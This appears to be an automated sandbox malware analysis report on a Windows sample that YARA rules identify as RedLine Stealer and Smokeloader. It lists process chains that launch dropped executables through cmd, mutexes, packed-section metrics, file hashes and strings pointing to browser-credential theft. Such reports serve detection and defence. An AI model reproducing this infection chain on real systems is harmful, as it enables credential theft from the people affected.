Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34EFF0	8_2_6C34EFF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C270FE0	8_2_6C270FE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C0820	8_2_6C2C0820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FA820	8_2_6C2FA820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C344840	8_2_6C344840
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3768E0	8_2_6C3768E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C6900	8_2_6C2C6900
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2A8960	8_2_6C2A8960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3309B0	8_2_6C3309B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3009A0	8_2_6C3009A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A9A0	8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C38C9E0	8_2_6C38C9E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2A49F0	8_2_6C2A49F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C328A30	8_2_6C328A30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C31EA00	8_2_6C31EA00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2ECA70	8_2_6C2ECA70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2EEA80	8_2_6C2EEA80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310BA0	8_2_6C310BA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C376BE0	8_2_6C376BE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D4420	8_2_6C2D4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FA430	8_2_6C2FA430
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C288460	8_2_6C288460
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C39A480	8_2_6C39A480
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30A4D0	8_2_6C30A4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2B64D0	8_2_6C2B64D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C310570	8_2_6C310570
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D2560	8_2_6C2D2560
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B8550	8_2_6C3B8550
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2C8540	8_2_6C2C8540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C374540	8_2_6C374540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2645B0	8_2_6C2645B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33A5E0	8_2_6C33A5E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2FE5F0	8_2_6C2FE5F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CC650	8_2_6C2CC650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2CE6E0	8_2_6C2CE6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30E6E0	8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2946D0	8_2_6C2946D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F0700	8_2_6C2F0700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C29A7D0	8_2_6C29A7D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C338010	8_2_6C338010
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C33C000	8_2_6C33C000
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2BE070	8_2_6C2BE070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34C0B0	8_2_6C34C0B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2800B0	8_2_6C2800B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C268090	8_2_6C268090
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C354130	8_2_6C354130

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3FDAE0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3FD930 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C3F09D0 appears 184 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C299B10 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C1FCBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C2094D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: String function: 6C293620 appears 49 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432

Uses 32bit PE files

Source: 8NjcvPNvUr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: random[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8ec8c5c339.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 8NjcvPNvUr.exe	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: 8NjcvPNvUr.exe	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: explorti.exe.0.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 1.00023193359375
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 1.00023193359375
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: 1c593ec106.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: random[1].exe.8.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: random[1].exe.8.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: random[1].exe0.8.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: random[1].exe0.8.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: axplong.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: axplong.exe.18.dr	Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@44/53@22/10

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_6C227030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

8_2_6C227030

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8052
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6704
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess848

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 8ec8c5c339.exe, 00000008.00000003.2421887599.00000000229E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 8NjcvPNvUr.exe

Virustotal: Detection: 52%

Source: 8NjcvPNvUr.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8ec8c5c339.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: 8ec8c5c339.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File read: C:\Users\user\Desktop\8NjcvPNvUr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8NjcvPNvUr.exe "C:\Users\user\Desktop\8NjcvPNvUr.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6704 -s 1312
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1028
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
